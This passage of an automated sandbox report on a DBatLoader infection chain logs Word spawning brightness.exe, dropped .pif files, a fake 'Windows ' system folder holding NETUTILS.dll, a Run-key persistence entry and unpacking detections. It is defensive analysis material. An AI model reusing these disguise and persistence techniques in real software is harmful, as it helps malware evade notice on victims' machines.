Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: am.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ?.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Nsltarpn.PIF	Section loaded: vsstrace.dll

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000007.00000002.2277740213.000000007F30F000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2217020694.000000007F620000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000205BD000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216325218.000000007F650000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.7.dr
Source:	Binary string: _.pdb source: npratlsN.pif, 0000000D.00000002.3860715684.000000001EFB0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3849386663.000000001C789000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000002.3846855423.000000001AC41000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2257670343.000000001AC43000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000D.00000003.2247172784.000000001ABEB000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3852777608.000000002D5F9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000F.00000002.3862851449.000000002FD20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000F.00000003.2375068803.000000002B88C000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3860251112.000000002AA40000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000011.00000003.2448793882.0000000026783000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000011.00000002.3848573367.00000000280E9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000007.00000003.2237481198.00000000212D2000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.00000000204B9000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2237481198.0000000021301000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2216325218.000000007F650000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.2273645981.0000000020460000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000E.00000002.2401892915.00000000204F0000.00000004.00001000.00020000.00000000.sdmp, svchost.pif.7.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 13.2.npratlsN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 15.2.npratlsN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 17.2.npratlsN.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 13.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 15.2.npratlsN.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\npratlsN.pif	Unpacked PE file: 17.2.npratlsN.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 7.2.brightness.exe.2780000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000003.2179264419.000000007FCB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: svchost.pif.7.dr

Static PE information: 0xA57E43AD [Tue Dec 25 14:18:21 2057 UTC]

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_02798818 LoadLibraryW,GetProcAddress,FreeLibrary,

7_2_02798818

Source: initial sample

Static PE information: section where entry point is pointing to: .

Source: Nsltarpn.PIF.7.dr	Static PE information: real checksum: 0x0 should be: 0xdb56f
Source: NETUTILS.dll.7.dr	Static PE information: real checksum: 0x273f3 should be: 0x26a85
Source: brightness.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xdb56f

Source: svchost.pif.7.dr	Static PE information: section name: .imrsiv
Source: svchost.pif.7.dr	Static PE information: section name: .didat
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: .
Source: NETUTILS.dll.7.dr	Static PE information: section name: /4
Source: NETUTILS.dll.7.dr	Static PE information: section name: /19
Source: NETUTILS.dll.7.dr	Static PE information: section name: /31
Source: NETUTILS.dll.7.dr	Static PE information: section name: /45
Source: NETUTILS.dll.7.dr	Static PE information: section name: /57
Source: NETUTILS.dll.7.dr	Static PE information: section name: /70
Source: NETUTILS.dll.7.dr	Static PE information: section name: /81
Source: NETUTILS.dll.7.dr	Static PE information: section name: /92

Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027AD2FC push 027AD367h; ret	7_2_027AD35F
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0278C349 push 8B0278C1h; ret	7_2_0278C34E
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0278332C push eax; ret	7_2_02783368
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279F3FC push ecx; mov dword ptr [esp], edx	7_2_0279F401
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027863B0 push 0278640Bh; ret	7_2_02786403
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027863AE push 0278640Bh; ret	7_2_02786403
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279306B push 027930B9h; ret	7_2_027930B1
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279306C push 027930B9h; ret	7_2_027930B1
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027AD0AC push 027AD125h; ret	7_2_027AD11D
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027AD144 push 027AD1ECh; ret	7_2_027AD1E4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027AD1F8 push 027AD288h; ret	7_2_027AD280
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02798738 push 0279877Ah; ret	7_2_02798772
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02786782 push 027867C6h; ret	7_2_027867BE
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02786784 push 027867C6h; ret	7_2_027867BE
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0278C56C push ecx; mov dword ptr [esp], edx	7_2_0278C571
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_027AC550 push 027AC76Eh; ret	7_2_027AC766
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0278D5A0 push 0278D5CCh; ret	7_2_0278D5C4
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0278CBEC push 0278CD72h; ret	7_2_0278CD6A
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0278C95F push 0278CD72h; ret	7_2_0278CD6A
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02796948 push 027969F3h; ret	7_2_027969EB
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02796946 push 027969F3h; ret	7_2_027969EB
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279790C push 02797989h; ret	7_2_02797981
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279A998 push 0279A9D0h; ret	7_2_0279A9C8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02798990 push 027989C8h; ret	7_2_027989C0
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279A997 push 0279A9D0h; ret	7_2_0279A9C8
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_0279898E push 027989C8h; ret	7_2_027989C0
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02795E7C push ecx; mov dword ptr [esp], edx	7_2_02795E7E
Source: C:\Windows\SysWOW64\brightness.exe	Code function: 7_2_02792F60 push 02792FD6h; ret	7_2_02792FCE
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_0041C40C push cs; iretd	13_2_0041C4E2
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_00423149 push eax; ret	13_2_00423179
Source: C:\Users\Public\Libraries\npratlsN.pif	Code function: 13_2_0041C50E push cs; iretd	13_2_0041C4E2

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\npratlsN.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\Nsltarpn.PIF	Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Executable created and started: C:\Windows\SysWOW64\brightness.exe

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\npratlsN.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Users\Public\Libraries\Nsltarpn.PIF	Jump to dropped file

Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\svchost.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\brightness.exe	File created: C:\Windows \SysWOW64\NETUTILS.dll	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	File created: C:\Windows\SysWOW64\brightness.exe	Jump to dropped file

Source: C:\Windows\SysWOW64\brightness.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nsltarpn			Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Nsltarpn			Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 7_2_0279A9D4 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_0279A9D4

Source: C:\Users\Public\Libraries\npratlsN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\Public\Libraries\npratlsN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\Public\Libraries\npratlsN.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
